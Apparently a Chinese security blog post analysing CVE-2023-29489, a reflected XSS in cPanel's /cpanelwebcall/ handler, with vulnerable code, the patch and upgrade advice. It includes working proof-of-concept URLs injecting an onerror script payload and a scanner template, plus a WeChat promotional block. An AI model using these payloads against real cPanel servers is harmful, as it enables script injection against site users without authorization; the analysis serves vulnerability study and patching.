头图

一、漏洞原理

漏洞简述

cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail 及多种电邮协议、网页化 FTP 管理、SSH 连线、数据库管理系统、DNS 管理等远端网页式主机管理软件功能。

该漏洞可以无身份验证情况下利用,无论cPanel管理端口2080, 2082, 2083, 2086是否对外开放

漏洞影响范围

供应商:cPanel

产品:cPanel

确认受影响版本:< 11.109.9999.116

修复版本:11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31

漏洞分析

本漏洞的漏洞点来自系统中涉及交互的关键变量未进行转义或过滤处理,导致攻击者可以构造恶意代码作为输入进行利用。

Httpd.pm:

elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {

    # First 15 chars are “/cpanelwebcall/”
    _serve_cpanelwebcall(
        $self->get_server_obj(),
        substr( $doc_path, 15 ),
    );
}

上述代码说明任何路径均会被路由到,包括目录后的字符部分。

其中涉及函数_serve_cpanelwebcall:

sub _serve_cpanelwebcall ( $server_obj, $webcall_uri_piece ) {
    require Cpanel::Server::WebCalls;
    my $out = Cpanel::Server::WebCalls::handle($webcall_uri_piece);

    $server_obj->respond_200_ok_text($out);
    
    return;

}

其中局部变量out为handle函数的返回值,是参数webcall_uri_piece的处理结果。

sub handle ($request) {

    my $id = extract_id_from_request($request);
    substr( $request, 0, length $id ) = q<>;

    Cpanel::WebCalls::ID::is_valid($id) or do {
        die _http_invalid_params_err("Invalid webcall ID: $id");
    };

handle函数主要先从request提取id,之后根据id情况进行处理

sub _http_invalid_params_err ($why) {
    return Cpanel::Exception::create_raw( 'cpsrvd::BadRequest', $why );
}

_http_invalid_params_err函数主要是返回错误信息

进一步分析发现Httpd::ErrorPage下的 message_html变量未做任何处理,可被该漏洞利用

【----帮助网安学习,以下所有学习资料加vx:yj009991,备注“思否”获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

补丁部分

在最新版本cPanel可以看到针对该漏洞进行修复

Cpanel/Server/Handlers/Httpd/ErrorPage.pm:

++ use Cpanel::Encoder::Tiny               ();    

... omitted for brevity ...

++ $var{message_html} = Cpanel::Encoder::Tiny::safe_html_encode_str( $var{message_html} );

二、漏洞复现实战

漏洞复现

首先以某个cPanel target为例

cPanel资产

之后根据POC进行复现

POC

http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa

注:其他端口也有可能存在该漏洞

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
    matchers:
      - type: word
        words:
          - '<img src=x onerror="prompt(1)">'

执行POC

XSS POC执行情况

漏洞修复

建议更新至版本11.109.9999.116、 11.108.0.13 、11.106.0.18 和 11.102.0.31

启用cPanel 自动更新功能

结束语

本文主要介绍了CVE-2023-29489 cPanel XSS漏洞的原理分析及复现过程,漏洞主要由于涉及交互的关键变量未进行转义或过滤处理,从而造成攻击者可以在无身份验证情况下进行利用。

更多网安技能的在线实操练习,请点击这里>>


蚁景网安实验室
53 声望45 粉丝

蚁景网安实验室(www.yijinglab.com)-领先的实操型网络安全在线教育平台 真实环境,在线实操学网络安全 ;内容涵盖:系统安全,软件安全,网络安全,Web安全,移动安全,CTF,取证分析,渗透测试,网安意识教育等。